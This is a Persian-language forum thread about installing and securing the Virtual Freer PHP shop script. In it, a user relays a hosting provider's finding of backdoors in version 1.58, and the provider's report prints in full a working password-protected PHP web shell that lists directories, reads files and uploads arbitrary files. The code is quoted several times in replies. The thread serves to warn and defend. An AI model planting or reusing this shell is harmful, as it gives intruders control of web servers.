اسکریپت رایگان فروش کارت‌های شارژ و محصولات مجازی Virtual Freer

نقل قول:

---

نوشته اصلی توسط kyko

بعضی از مشتری ها بعد از پرداخت با خطای (سفارش قبلا پرداخت شده است) مواجه میشند
دلیلش چی هست

---

سلام
دوست عزیز ابتدا از فایل های درون پوشه public html یه بک آپ بگیرید
سپس از روی database بک آپ بگیرید
حال ابتدا فایل upgerade.sql مربوط به آپگرید به ورژن 1.58 رو طبق آموزش سایت Freer درون database ایمپورت کنید
نهایتا کل محتویات پوشه public html رو پاک کنید و نسخه نصبی 1.58 رو به پوشه public html انتقال داده و با همان اطلاعات دیتابیس قبلی نصب کنید
ورژن 1.58 که نصب شد یکبار دیگه فایل های مربوط به درگاه رو به پوشه پلاگین رو انتقال بدید و اطلاعات درگاه رو درون تنظیمات مدیریت وارد کنید
مشکل به صورت ریشه ای حل می شود
حتما موارد امنیتی توصیه شده در این سایت رو هم بعد از اوکی شدن ورژن 1.58 انجام بدید تا خیالتون راحت باشه
http://www.softiran.org/view-item/97...safe-pack.html
شخصا کلی تست انجام دادم تا مشکل به همین صورت که عرض کردم حل شد

سلام من فایل فریر اپلود کردم این خطا رو موقع نصب میده؟!!!

Parse error: syntax error, unexpected '$config' (T_VARIABLE), expecting identifier (T_STRING) in /var/www/vhosts/mydomain.ir/httpdocs/freer/install/index.php on line 258

- - - Updated - - -

سلام دوستان
من وقتی میخوام فریر رو نصب کم با ین خطا مواجه میشم علت چیه؟
ممنون میشم راهنمایی بفرمایید.
Parse error: syntax error, unexpected '$config' (T_VARIABLE), expecting identifier (T_STRING) in /var/www/vhosts/mydomain.ir/httpdocs/freer/install/index.php on line 258

سلام خدمت اساتید

من ورژن 1.58 که آخرین ورژن هست رو از سایت دانلود کردم , اما موقع انتقال با ارور تروجان مواجه شدم و وقتی که مدیر سایت گفتم این مطلب رو برام فرستاد که من این متن رو برای طراح اسکریت ایمیل کردم و گفتم :

کد PHP:

---

سلام
خسته نباشید
من اومدم اسکریپت رو به هاستم انتقال بدم که دیدم ارور تروجان میگیره
با مدیریت هاست در تماس بودم که این مطلب رو در مورد بکدور و... برام ارسال کرد که عینا براتون ارسال میکنم.
فایل هم ضمیمه شد

فکر کردم قبل از پرسیدن و مطرح کردن تو وب هاستینگ تاک با شما صحبت کنم

منتظر حل مشکل هستم


با سلام خدمت شما

 طی بررسی فایل آرشیو ارسالی کدهای بکدور در ۳ فایل زیر در این آرشیو شناسایی شد:

virtual_freer_v1.58/include/libs/smarty/sysplugins/smarty_internal_templateparser.php
virtual_freer_v1.58/include/libs/smarty/sysplugins/smarty_internal_configfileparser.php
virtual_freer_v1.58/include/libs/nusoap.php

جزییات دقیق کدهای شناسایی شده در فایل پیوست تیکت قابل مشاهده می باشد.

این کدها امکان اجرای کدهای ریموت و یا آپلود شل را بر روی سایت میزبان  فراهم می کنند. در صورتیکه این فایل را از سایت مرجع و اصلی طراح اسکریپت  دریافت ننموده اید پیشنهاد می شود از استفاده از این آرشیو نصب بر روی  سرویس خود پرهیز نمایید و به جای آن فایل آرشیو را از سایت اصلی دریافت  نمایید.

چنانچه فایل را از سایت اصلی دریافت نموده اید، خواهشمند است حتما موضوع را  به طراح اسکریپت/مدیر سایت مورد نظر اطلاع داده و از ایشان بخواهید حتما  این مشکل را پیگیری و چگونگی اینجکت کدها بکدور به آرشیو نصب ارایه شده را  پیگیری و بررسی های امنیتی دقیق در این مورد را پیگیری کنند. همچنین حتما  کد اسکریپت را به صورت کامل بررسی و از عدم وجود کدهای بکدور دیگر در آرشیو  ارایه شده اطمینان حاصل نموده و پس از پاکسازی کامل و رفع مشکل امنیتی  آرشیو نصب جدید را در اختیار شما قرار دهند.( فایل آرشیو تیکت حاوی کدهای  مخرب شناسایی شده است شما متیوانید این فایل را جهت پیگیری در اختیار  طراح/مدیر سایتی که آرشیو را از آن سایت دریافت نموده اید قرار دهید)
و این فایل رو dmz هم برام فرستاد که بدم (آپلود کردم) 


---

طراح هم در جواب بهم گفتن که برم از سایت و دوباره دانلود کنم

و باز به مدیر هاست گفتم و ایشون باز یه ارور دیگه گرفتن و من باز برای طراح اسکریپت فرستادم که اصلاح کنن , اما 3 روزه که خبری نشده

کد PHP:

---

سلام مجدد


این رو هم بخونید لطفا



با سلام خدمت شما

در فایل آرشیو جدید ارسالی کدهای مخرب شناسایی شده حذف شده اند. اما یک مورد کد بکدور دیگر که قبلا شناسایی نشده بود در فایل

virtual_freer_v1.58/include/libs/smarty/plugins/function.engine.php

مشاهده شد. این کد نیز یک کد بکدور برای آپلود فایل دلخواه می باشد.

کد شناسایی شده به شرح زیر است:

============

$user='16d1a558492edec3ed7775be2942c1cd';
$pass='16d1a558492edec3ed7775be2942c1cd';

if ($_SERVER["PHP_AUTH_USER"] == "" || $_SERVER["PHP_AUTH_PW"] == "" ||  md5($_SERVER["PHP_AUTH_USER"]) != $user || md5($_SERVER["PHP_AUTH_PW"])  !=$pass) {
    header("HTTP/1.0 401 Unauthorized");
    header("WWW-Authenticate: Basic realm=\"eshghi");
    echo "<h1>Authorization Required.</h1>";
    die();
}else{
error_reporting(0);
set_magic_quotes_runtime(0);
if(strtolower(substr(PHP_OS, 0, 3)) == "win"){$s="\\";
}else{$s="/";
}$ad=$_REQUEST['ad'];
if ($ad){chdir($ad);}else{$ad=getcwd();
}if ($_FILES["ff"]){move_uploaded_file($_FILES["ff"]["tmp_name"], $_FILES["ff"]["name"]);}
if ($hr = opendir($ad)) {while($f = readdir($hr)){if(is_dir($f)){$df=$df.$f.'
';}else{$lf=$lf.$f.'
';}}closedir($hr);
}$form='<form action="'.$_SERVER['PHP_SELF'].'" method=post>';
echo '<center><textarea cols=90 rows=20>';
if($_GET['cme']){opendir($_GET['cme']);
}else{echo $df.$lf;};
echo'</textarea>'.$form.'Change Dir : <input name=ad size=50 value='.getcwd().$s.'>
<input type=submit value=Go></form>'.$form.'Read File : <input name=cme size=50 value=id>
 <input type=submit value=Read!></form>
 <form action="'.$me.'" method=post enctype=multipart/form-data>
 Upload : <input size=50 type=file name=ff > <input type=hidden name=ad value='.getcwd().'>
 <input type=submit value=Send></form><br>';

 if(isset ($_POST['cme'])){
$myFile = $_POST['cme'];
$fh = fopen($myFile, 'r');
if($theData = fread($fh, filesize($myFile))){
fclose($fh);
echo '<textarea clos=90 rows=20>'.$theData.'</textarea>';
}
else{
echo "File Could Not Found!!";
}}}

?>

============

با توجه به این اطلاعات ظاهرا کد آرشیو به صورت کامل توسط طراح اسکریپت  بررسی و پاکسازی نشده است. اطمینان کامل از عدم وجود کدهای مخرب تنها با  بررسی دقیق کدهای تمامی اسکریپتها امکانپذیر می باشد در غیر اینصورت تضمینی  برای شناسایی تمامی کدهای مخرب وجود ندارد(کما اینکه در بررسی اولیه انجام  شده  کد مورد اشاره در بالا شناسایی نشده بود). با توجه به  این موضوع پیشنهاد می شود تا بررسی کامل فایلهای آرشیو نصب اسکریپت که ممکن  است چند روز به زمان نیاز داشته باشد از نصب این اسکریپت بر روی سرویس خود  پرهیز نمایید. البته در صورت نگهداری آرشیو های جداگانه از فایلها و  نگهداری هش تمامی فایلهای بسته در یک محل امن و یا استفاده از ابزازهای  مدیریت سوروس برنامه هایی مانند
git
برای مدیریت و نگهداری سورس برنامه توسط طراح اسکریپت، به راحتی امکان  شناسایی چنین نفوذها و دستکاری هایی و اصلاح سریع آنها توسط طراح وجود  خواهد داشت. 


---

این رو هم فرستادم اما خبری نشد

از دوستان کسی هست که بتونه این مشکل رو برطرف بکنه ؟

سلام
کدی که اشاره کردید رو منم تو سایت خودم مشاهده کردم. البته تو فایل اپلودی در سور فریر امروز اصلاح شده!!!
فریر نه از طرف نویسنده و نه از جانب نفوز هکر ها قابل اطمینان نیست.

نقل قول:

---

نوشته اصلی توسط Alirezayb

سلام خدمت اساتید

من ورژن 1.58 که آخرین ورژن هست رو از سایت دانلود کردم , اما موقع انتقال با ارور تروجان مواجه شدم و وقتی که مدیر سایت گفتم این مطلب رو برام فرستاد که من این متن رو برای طراح اسکریت ایمیل کردم و گفتم :

کد PHP:

---

سلام
خسته نباشید
من اومدم اسکریپت رو به هاستم انتقال بدم که دیدم ارور تروجان میگیره
با مدیریت هاست در تماس بودم که این مطلب رو در مورد بکدور و... برام ارسال کرد که عینا براتون ارسال میکنم.
فایل هم ضمیمه شد

فکر کردم قبل از پرسیدن و مطرح کردن تو وب هاستینگ تاک با شما صحبت کنم

منتظر حل مشکل هستم


با سلام خدمت شما

 طی بررسی فایل آرشیو ارسالی کدهای بکدور در ۳ فایل زیر در این آرشیو شناسایی شد:

virtual_freer_v1.58/include/libs/smarty/sysplugins/smarty_internal_templateparser.php
virtual_freer_v1.58/include/libs/smarty/sysplugins/smarty_internal_configfileparser.php
virtual_freer_v1.58/include/libs/nusoap.php

جزییات دقیق کدهای شناسایی شده در فایل پیوست تیکت قابل مشاهده می باشد.

این کدها امکان اجرای کدهای ریموت و یا آپلود شل را بر روی سایت میزبان  فراهم می کنند. در صورتیکه این فایل را از سایت مرجع و اصلی طراح اسکریپت  دریافت ننموده اید پیشنهاد می شود از استفاده از این آرشیو نصب بر روی  سرویس خود پرهیز نمایید و به جای آن فایل آرشیو را از سایت اصلی دریافت  نمایید.

چنانچه فایل را از سایت اصلی دریافت نموده اید، خواهشمند است حتما موضوع را  به طراح اسکریپت/مدیر سایت مورد نظر اطلاع داده و از ایشان بخواهید حتما  این مشکل را پیگیری و چگونگی اینجکت کدها بکدور به آرشیو نصب ارایه شده را  پیگیری و بررسی های امنیتی دقیق در این مورد را پیگیری کنند. همچنین حتما  کد اسکریپت را به صورت کامل بررسی و از عدم وجود کدهای بکدور دیگر در آرشیو  ارایه شده اطمینان حاصل نموده و پس از پاکسازی کامل و رفع مشکل امنیتی  آرشیو نصب جدید را در اختیار شما قرار دهند.( فایل آرشیو تیکت حاوی کدهای  مخرب شناسایی شده است شما متیوانید این فایل را جهت پیگیری در اختیار  طراح/مدیر سایتی که آرشیو را از آن سایت دریافت نموده اید قرار دهید)
و این فایل رو dmz هم برام فرستاد که بدم (آپلود کردم) 


---

طراح هم در جواب بهم گفتن که برم از سایت و دوباره دانلود کنم

و باز به مدیر هاست گفتم و ایشون باز یه ارور دیگه گرفتن و من باز برای طراح اسکریپت فرستادم که اصلاح کنن , اما 3 روزه که خبری نشده

کد PHP:

---

سلام مجدد


این رو هم بخونید لطفا



با سلام خدمت شما

در فایل آرشیو جدید ارسالی کدهای مخرب شناسایی شده حذف شده اند. اما یک مورد کد بکدور دیگر که قبلا شناسایی نشده بود در فایل

virtual_freer_v1.58/include/libs/smarty/plugins/function.engine.php

مشاهده شد. این کد نیز یک کد بکدور برای آپلود فایل دلخواه می باشد.

کد شناسایی شده به شرح زیر است:

============

$user='16d1a558492edec3ed7775be2942c1cd';
$pass='16d1a558492edec3ed7775be2942c1cd';

if ($_SERVER["PHP_AUTH_USER"] == "" || $_SERVER["PHP_AUTH_PW"] == "" ||  md5($_SERVER["PHP_AUTH_USER"]) != $user || md5($_SERVER["PHP_AUTH_PW"])  !=$pass) {
    header("HTTP/1.0 401 Unauthorized");
    header("WWW-Authenticate: Basic realm=\"eshghi");
    echo "<h1>Authorization Required.</h1>";
    die();
}else{
error_reporting(0);
set_magic_quotes_runtime(0);
if(strtolower(substr(PHP_OS, 0, 3)) == "win"){$s="\\";
}else{$s="/";
}$ad=$_REQUEST['ad'];
if ($ad){chdir($ad);}else{$ad=getcwd();
}if ($_FILES["ff"]){move_uploaded_file($_FILES["ff"]["tmp_name"], $_FILES["ff"]["name"]);}
if ($hr = opendir($ad)) {while($f = readdir($hr)){if(is_dir($f)){$df=$df.$f.'
';}else{$lf=$lf.$f.'
';}}closedir($hr);
}$form='<form action="'.$_SERVER['PHP_SELF'].'" method=post>';
echo '<center><textarea cols=90 rows=20>';
if($_GET['cme']){opendir($_GET['cme']);
}else{echo $df.$lf;};
echo'</textarea>'.$form.'Change Dir : <input name=ad size=50 value='.getcwd().$s.'>
<input type=submit value=Go></form>'.$form.'Read File : <input name=cme size=50 value=id>
 <input type=submit value=Read!></form>
 <form action="'.$me.'" method=post enctype=multipart/form-data>
 Upload : <input size=50 type=file name=ff > <input type=hidden name=ad value='.getcwd().'>
 <input type=submit value=Send></form><br>';

 if(isset ($_POST['cme'])){
$myFile = $_POST['cme'];
$fh = fopen($myFile, 'r');
if($theData = fread($fh, filesize($myFile))){
fclose($fh);
echo '<textarea clos=90 rows=20>'.$theData.'</textarea>';
}
else{
echo "File Could Not Found!!";
}}}

?>

============

با توجه به این اطلاعات ظاهرا کد آرشیو به صورت کامل توسط طراح اسکریپت  بررسی و پاکسازی نشده است. اطمینان کامل از عدم وجود کدهای مخرب تنها با  بررسی دقیق کدهای تمامی اسکریپتها امکانپذیر می باشد در غیر اینصورت تضمینی  برای شناسایی تمامی کدهای مخرب وجود ندارد(کما اینکه در بررسی اولیه انجام  شده  کد مورد اشاره در بالا شناسایی نشده بود). با توجه به  این موضوع پیشنهاد می شود تا بررسی کامل فایلهای آرشیو نصب اسکریپت که ممکن  است چند روز به زمان نیاز داشته باشد از نصب این اسکریپت بر روی سرویس خود  پرهیز نمایید. البته در صورت نگهداری آرشیو های جداگانه از فایلها و  نگهداری هش تمامی فایلهای بسته در یک محل امن و یا استفاده از ابزازهای  مدیریت سوروس برنامه هایی مانند
git
برای مدیریت و نگهداری سورس برنامه توسط طراح اسکریپت، به راحتی امکان  شناسایی چنین نفوذها و دستکاری هایی و اصلاح سریع آنها توسط طراح وجود  خواهد داشت. 


---

این رو هم فرستادم اما خبری نشد

از دوستان کسی هست که بتونه این مشکل رو برطرف بکنه ؟

---

1- فریر را از کجا دانلود کردید ؟ از سایت اصلی فریر freer.ir یا سایت های اسکریپت رایگان ؟

2- اگر شما از این پکیچ استفاده کنید :
http://www.softiran.org/view-item/97...safe-pack.html
دسترسی اجرا شل در تمامی این فولدر ها قطع میشود و اگر شل هم روی هاست شما باشد کسی نمیتواند از آن استفاده کند.

3- اسمارتی یک کتابخانه است ، شما میتواند کل فولدر اسمارتی را از روی هاست حذف کنید و آخرین ورژن را از این سایت دانلود :
http://www.smarty.net/download
کنید و از آن استفاده کنید .

فقط حتما بعد از به روز رسانی اسمارتی محتوایات فولدر templates_c را حذف کنید .

نقل قول:

---

نوشته اصلی توسط us12

1- فریر را از کجا دانلود کردید ؟ از سایت اصلی فریر freer.ir یا سایت های اسکریپت رایگان ؟

2- اگر شما از این پکیچ استفاده کنید :
http://www.softiran.org/view-item/97...safe-pack.html
دسترسی اجرا شل در تمامی این فولدر ها قطع میشود و اگر شل هم روی هاست شما باشد کسی نمیتواند از آن استفاده کند.

3- اسمارتی یک کتابخانه است ، شما میتواند کل فولدر اسمارتی را از روی هاست حذف کنید و آخرین ورژن را از این سایت دانلود :
http://www.smarty.net/download
کنید و از آن استفاده کنید .

فقط حتما بعد از به روز رسانی اسمارتی محتوایات فولدر templates_c را حذف کنید .

---

بنده فریر ور از سایت freer.ir دانلود کردم . ورژن 1.58 مربوط به چند روز پیش
امروز که مجدد دانلود کردم فایلهایی که اشاره کرده بودند اصلاح شده بودند .

تشکر بابت راهنمایی

نقل قول:

---

نوشته اصلی توسط doctorportable

بنده فریر ور از سایت freer.ir دانلود کردم . ورژن 1.58 مربوط به چند روز پیش
امروز که مجدد دانلود کردم فایلهایی که اشاره کرده بودند اصلاح شده بودند .

تشکر بابت راهنمایی

---

البته فریر که الان برای دانلود قرار داده باز هم شل هایی در فایل install.php دارد !!

به زودی همان نسخه قبلی 1.57 با امنیت تضمین شده را لینک میدهم تا کاربران دانلود کنند .


-----------
ورژن 1.57 با آخرین تمهیدات امنیتی :

http://www.softiran.org/article/57/v...sion-1.57.html

نقل قول:

---

نوشته اصلی توسط us12

البته فریر که الان برای دانلود قرار داده باز هم شل هایی در فایل install.php دارد !!

به زودی همان نسخه قبلی 1.57 با امنیت تضمین شده را لینک میدهم تا کاربران دانلود کنند .


-----------
ورژن 1.57 با آخرین تمهیدات امنیتی :

http://www.softiran.org/article/57/v...sion-1.57.html

---

ورژن 1.57 مشکلاتی داره و مهمترینش عدم تحویل بعد از پرداخت بود
شما که وارد هستید مشکلات ورژن 1.58 را شناسایی و به سازنده اسکریپت اطلاع بدید :53:

نقل قول:

---

نوشته اصلی توسط kyko

ورژن 1.57 مشکلاتی داره و مهمترینش عدم تحویل بعد از پرداخت بود
شما که وارد هستید مشکلات ورژن 1.58 را شناسایی و به سازنده اسکریپت اطلاع بدید :53:

---

من اطلاع دادم ولی معلوم نیست چرا هر فایلی که آپلود می کند یک شل داره !

بازم به نظر من برای کارهای عادی ورژن 1.57 بهتر از 1.58 است و هر کس با ورژن قبلی مشکل دارد باید موردی بررسی شود تا علت اصلی ( که به احتمال زیاد به هاست و ورژن php مربوط میشود ) پیدا شود .

اگر هم وقت داشته باشم ورژن 1.58 را ایمن شده لینک قرار میدهم ...

ناگفته نماید لینکی که گذاشتم با PHP ورژن 5.4 مشکلی ندارد و می توانید ورژن پی اچ پی را بالا ببرید .

نقل قول:

---

نوشته اصلی توسط us12

1- فریر را از کجا دانلود کردید ؟ از سایت اصلی فریر freer.ir یا سایت های اسکریپت رایگان ؟

2- اگر شما از این پکیچ استفاده کنید :
http://www.softiran.org/view-item/97...safe-pack.html
دسترسی اجرا شل در تمامی این فولدر ها قطع میشود و اگر شل هم روی هاست شما باشد کسی نمیتواند از آن استفاده کند.

3- اسمارتی یک کتابخانه است ، شما میتواند کل فولدر اسمارتی را از روی هاست حذف کنید و آخرین ورژن را از این سایت دانلود :
http://www.smarty.net/download
کنید و از آن استفاده کنید .

فقط حتما بعد از به روز رسانی اسمارتی محتوایات فولدر templates_c را حذف کنید .

---

از خود سایت اصلی دانلود کرده بودم

- - - Updated - - -

نقل قول:

---

نوشته اصلی توسط Alirezayb

طراح هم در جواب بهم گفتن که برم از سایت و دوباره دانلود کنم

و باز به مدیر هاست گفتم و ایشون باز یه ارور دیگه گرفتن و من باز برای طراح اسکریپت فرستادم که اصلاح کنن , اما 3 روزه که خبری نشده

کد PHP:

---

سلام مجدد


این رو هم بخونید لطفا



با سلام خدمت شما

در فایل آرشیو جدید ارسالی کدهای مخرب شناسایی شده حذف شده اند. اما یک مورد کد بکدور دیگر که قبلا شناسایی نشده بود در فایل

virtual_freer_v1.58/include/libs/smarty/plugins/function.engine.php

مشاهده شد. این کد نیز یک کد بکدور برای آپلود فایل دلخواه می باشد.

کد شناسایی شده به شرح زیر است:

============

$user='16d1a558492edec3ed7775be2942c1cd';
$pass='16d1a558492edec3ed7775be2942c1cd';

if ($_SERVER["PHP_AUTH_USER"] == "" || $_SERVER["PHP_AUTH_PW"] == "" ||   md5($_SERVER["PHP_AUTH_USER"]) != $user || md5($_SERVER["PHP_AUTH_PW"])   !=$pass) {
    header("HTTP/1.0 401 Unauthorized");
    header("WWW-Authenticate: Basic realm=\"eshghi");
    echo "<h1>Authorization Required.</h1>";
    die();
}else{
error_reporting(0);
set_magic_quotes_runtime(0);
if(strtolower(substr(PHP_OS, 0, 3)) == "win"){$s="\\";
}else{$s="/";
}$ad=$_REQUEST['ad'];
if ($ad){chdir($ad);}else{$ad=getcwd();
}if ($_FILES["ff"]){move_uploaded_file($_FILES["ff"]["tmp_name"], $_FILES["ff"]["name"]);}
if ($hr = opendir($ad)) {while($f = readdir($hr)){if(is_dir($f)){$df=$df.$f.'
';}else{$lf=$lf.$f.'
';}}closedir($hr);
}$form='<form action="'.$_SERVER['PHP_SELF'].'" method=post>';
echo '<center><textarea cols=90 rows=20>';
if($_GET['cme']){opendir($_GET['cme']);
}else{echo $df.$lf;};
echo'</textarea>'.$form.'Change Dir : <input name=ad size=50 value='.getcwd().$s.'>
<input type=submit value=Go></form>'.$form.'Read File : <input name=cme size=50 value=id>
 <input type=submit value=Read!></form>
 <form action="'.$me.'" method=post enctype=multipart/form-data>
 Upload : <input size=50 type=file name=ff > <input type=hidden name=ad value='.getcwd().'>
 <input type=submit value=Send></form><br>';

 if(isset ($_POST['cme'])){
$myFile = $_POST['cme'];
$fh = fopen($myFile, 'r');
if($theData = fread($fh, filesize($myFile))){
fclose($fh);
echo '<textarea clos=90 rows=20>'.$theData.'</textarea>';
}
else{
echo "File Could Not Found!!";
}}}

?>

============

با توجه به این اطلاعات ظاهرا کد آرشیو به صورت کامل توسط طراح اسکریپت   بررسی و پاکسازی نشده است. اطمینان کامل از عدم وجود کدهای مخرب تنها با   بررسی دقیق کدهای تمامی اسکریپتها امکانپذیر می باشد در غیر اینصورت  تضمینی  برای شناسایی تمامی کدهای مخرب وجود ندارد(کما اینکه در بررسی  اولیه انجام  شده  کد مورد اشاره در بالا شناسایی نشده بود). با توجه به   این موضوع پیشنهاد می شود تا بررسی کامل فایلهای آرشیو نصب اسکریپت که  ممکن  است چند روز به زمان نیاز داشته باشد از نصب این اسکریپت بر روی  سرویس خود  پرهیز نمایید. البته در صورت نگهداری آرشیو های جداگانه از  فایلها و  نگهداری هش تمامی فایلهای بسته در یک محل امن و یا استفاده از  ابزازهای  مدیریت سوروس برنامه هایی مانند
git
برای مدیریت و نگهداری سورس برنامه توسط طراح اسکریپت، به راحتی امکان   شناسایی چنین نفوذها و دستکاری هایی و اصلاح سریع آنها توسط طراح وجود   خواهد داشت. 


---

این رو هم فرستادم اما خبری نشد

از دوستان کسی هست که بتونه این مشکل رو برطرف بکنه ؟

---

در مورد بخش دوم که جواب نداده بودن هم ایشون جواب ایمیل من و ریپورت باگ رو اینچنینی دادن :

سلام

فایل گزارش شده را کامل پاک کنید.
//

در حال برنامه ریزی برای نسخه دوم فریر هستیم و پشتیبانی و رفع مشکلات نسخه جاری را به حداقل رساندیم و فقط مشکلاتی که گزارش می‌شود را رفع می کنیم. اگر فایل مشکل دار دیگری یافتید اطلاع دهید.

نسخه 1.58 را الان دانود کردم با نمونه 2 روز قبل فرق کرده
اینایی که میگند باگ داره دوباره چک کنند ببینند مشکلاتش رو رفع شده یا نه

نقل قول:

---

نوشته اصلی توسط us12

البته فریر که الان برای دانلود قرار داده باز هم شل هایی در فایل install.php دارد !!

به زودی همان نسخه قبلی 1.57 با امنیت تضمین شده را لینک میدهم تا کاربران دانلود کنند .


-----------
ورژن 1.57 با آخرین تمهیدات امنیتی :

http://www.softiran.org/article/57/v...sion-1.57.html

---

از دوستان کسی این نسخه رو تست کرده ؟

- - - Updated - - -

نقل قول:

---

نوشته اصلی توسط kyko

نسخه 1.58 را الان دانود کردم با نمونه 2 روز قبل فرق کرده
اینایی که میگند باگ داره دوباره چک کنند ببینند مشکلاتش رو رفع شده یا نه

---

رفتم دوباره که دانلود کنم اما نود32 اجازه نمیده که سایت رو باز کنم , جالبه

Access denied


Access to the web page was blocked. Show URL


The web page is on the list of websites with potentially dangerous content.

نقل قول:

---

رفتم دوباره که دانلود کنم اما نود32 اجازه نمیده که سایت رو باز کنم , جالبه

---

نقل قول:

---

Access denied


Access to the web page was blocked. Show URL


The web page is on the list of websites with potentially dangerous content.

---

برای منم اینطور شد الان!!
اون نسخه 1.57 سافت ایران هم تست کردم خوب بود
ولی به نظرم از 1.58 استفاده کنید

ایا امکان نصب روی سرور اختصاصی با سیستم عامل ویندوز وجود دارد؟
ما تمام فایل هامونو واسه سایت فیلم از طریق iis لینک دادیم و الان متاسفانه به مشکل خوردیم اکثر سیستم های وی ای پی فقط قابل ارایه برای لینوکس هستن و ما هم نمیتونیم بعد از جمع اوری این همه اطلاعات سیستم عامل رو عوض کنیم
اگر کسی راهی سراغ داره ممنون میشیم برای فروش اکانت سیستمی رو معرفی کنه که قابلیت نصب روی ویندوز رو داشته باشه

نقل قول:

---

نوشته اصلی توسط payam358

ایا امکان نصب روی سرور اختصاصی با سیستم عامل ویندوز وجود دارد؟
ما تمام فایل هامونو واسه سایت فیلم از طریق iis لینک دادیم و الان متاسفانه به مشکل خوردیم اکثر سیستم های وی ای پی فقط قابل ارایه برای لینوکس هستن و ما هم نمیتونیم بعد از جمع اوری این همه اطلاعات سیستم عامل رو عوض کنیم
اگر کسی راهی سراغ داره ممنون میشیم برای فروش اکانت سیستمی رو معرفی کنه که قابلیت نصب روی ویندوز رو داشته باشه

---

فریر روی ویندوز هم قابل نصب و کانفیگ است .

برای وی آی پی هم می توانید از این ماژول استفاده کنید

http://www.softiran.org/view-item/77...-download.html

حتی با این ماژول می توانید فریر را روی یک هاست دیگر نصب کنید و مدیریت وی آی پی چند سرور را همزمان انجام دهید . ( حتما نباید فریر روی همان سرور ها باشد !)

سلام دوستان
پس از خرید پیغام Could not instantiate mail function نمایش داده می شود و ایمیلی برای خریدار ارسال نمی شود، ممنون میشم راهنمایی کنید مشکل از کجاست.
مرسی

فایل پیوست 29102

نقل قول:

---

نوشته اصلی توسط masi892

سلام دوستان
پس از خرید پیغام Could not instantiate mail function نمایش داده می شود و ایمیلی برای خریدار ارسال نمی شود، ممنون میشم راهنمایی کنید مشکل از کجاست.
مرسی

فایل پیوست 29102

---

2 حالت داره ، یا هاست شما php mail را مصدود کرده ، یا در تنظیمات ماژول ایمیل ارسال کننده را وارد نکردید یا ایمیل خارج از هاست وارد کردید ( مثلا ایمیل یاهو گذاشتید )

ممنون از پاسخ شما
به هاستینگ تیکت دادم. گفتن مشکلی در ارسال ایمیل از هاست نیست.
دو مورد دیگر هم چک شده و موردی نداره.
چیز دیگری به ذهنتون نمیرسه؟

دوستان من نسخه 1.58 رو دانلود کردم و توی هسات کپی کردم اما موقعی که آدرس پوشه install رو میزنم ارور میده در صورتی که در یک هاست دیگر این مشکل وجود نداشت میشه راهنماییم کنید
اینم آدرس سایت
www.pardakht2.ir

با سلام و خسته نباشید ، وقتی به عنوان مثال یک شارژ 2000 تومانی را به تعداد 2 عدد انتخاب می کنیم که جمع مبلغ می شود 4000 تومان ، تا اینجا درست. ، حالا اگه بیایم روی شارژ مستقیم کلیک کنیم و مثلا وارد کنیم مبلغ 4000 تومان همچنان این مبلغ در اون تعداد 2تا ضرب میشود. ، باید چکار کرد وقتی شارژ مستقیم انتخاب میشه اون تعداد در نظر گرفته نشه؟؟؟

دوستان پس از پرداخت اگه ناموفق بود موقع یازگشت به سایت پیغام درست نشون میده ولی اگه موفق بود وقتی به سایت خودم برمیگرده یه صفحه سفید نشون میده و حتی ایمیل هم به طرف ارسال نمیکنه

دوستان ورژن جدید 1.58توسط اکثر هاست ها هنگام اپلود ارور میده که فایل حاوی تروجان هستش و سایتشون هم توسط انتی ویروس نود 32 بلاک شده
کسی می تونه نسخه اخری رو انالیز کنه و اطلاع بده با تشکر

با سلام
از دوستان یک سوال داشتم
virtual freer رو نصب کردم ولی وقتی محصولات رو اضافه می کنم در سایت اصلیم قابلیت انتخاب کردن و کلیک شدن نداره (یعنی مثلا اگه یکی بخواد گزینه شارژ 2000 تومانی انتخاب کنه نمیتونه و قابل کلیک شدن نیست)
ممنون میشم راهنمایی کنین

با سلام هنگام نصب با پیغام زیر روبرو میشم

کد PHP:

---

Parse error:  syntax error, unexpected '$config' (T_VARIABLE), expecting identifier (T_STRING) in E:\xampp\htdocs\virtual\install\index.php on line 256 


---

مشکل در اضافه کردن محصول

با سلام من چندین وقته دارم از فریر استفاده میکنم الان یه مشکلی پیش اومده که دیگه محصول اضافه نمیشه هیچ محصولی هم در لیست ندارم اروری هم نمیده فقط صفحه رفرش میشه و هیچی محصولیم اضافه نمیشه چیکار کنم؟

امنیت فریر خیلی پایین هست..تازگی ما متوجه شدیم که یه سری از سایت ها ی فریر رو راحت بعضی ها هک میکنن و تو همون درگاهی که اون سایت کار میکنه باش اکانت میسازن و وقتی فریر رو هک کردن تو تنظیمات اکانت خودشون رو وارد میکنن و عملا از اون سایت ***ی میکنن....

کسی برای امن کردن فریر راهی سراغ داره؟؟؟؟

نقل قول:

---

نوشته اصلی توسط pooyanf

امنیت فریر خیلی پایین هست..تازگی ما متوجه شدیم که یه سری از سایت ها ی فریر رو راحت بعضی ها هک میکنن و تو همون درگاهی که اون سایت کار میکنه باش اکانت میسازن و وقتی فریر رو هک کردن تو تنظیمات اکانت خودشون رو وارد میکنن و عملا از اون سایت ***ی میکنن....

کسی برای امن کردن فریر راهی سراغ داره؟؟؟؟

---

http://www.softiran.org/view-item/97...safe-pack.html

سعی کنید این نسخه را نصب کنید ( نیاز به پکیج بالا ندارد )

http://www.softiran.org/article/57/v...sion-1.57.html

نقل قول:

---

نوشته اصلی توسط us12

http://www.softiran.org/view-item/97...safe-pack.html

سعی کنید این نسخه را نصب کنید ( نیاز به پکیج بالا ندارد )

http://www.softiran.org/article/57/v...sion-1.57.html

---

ممنون از شما...الان ما ورژنمون ۱.۵۸ هست....حالا با همون پکیج بالا میشه کار کرد اگه همون پکیج بالا رو نصب کنیم میشه مثله همون ۱.۵۷ که خودتون امن کردین؟؟؟یا باز هم فرق دارن؟؟

نقل قول:

---

نوشته اصلی توسط pooyanf

ممنون از شما...الان ما ورژنمون ۱.۵۸ هست....حالا با همون پکیج بالا میشه کار کرد اگه همون پکیج بالا رو نصب کنیم میشه مثله همون ۱.۵۷ که خودتون امن کردین؟؟؟یا باز هم فرق دارن؟؟

---

از پکیج استفاده کنید .
تمامی پسورد ها را تغییر دهید . ( حتی پسورد های یوزر دیتابیس )
نام فولدر بک را تغییر دهید.

سلام
من مشکل آپلود نشدن عکس در قسمت دسته ها و محصولاتو دارم
یعنی اصلا هیچ عکسی با هر فرمتی آپلود نمیشه
بعد از اینکه ذخیره می زنم میگه با موفقیت ویرایش شد وقتی چیزی آپ نمیشه !
در یه تاپییک گفته بودن عکس آپلود شده نمایش داده نمیشه که باید htaccess رو تغییر بدی (مشکل من این نیست به اون تاپیک ارجاع ندین!)
لطفا دقیق راهنمایی کنین
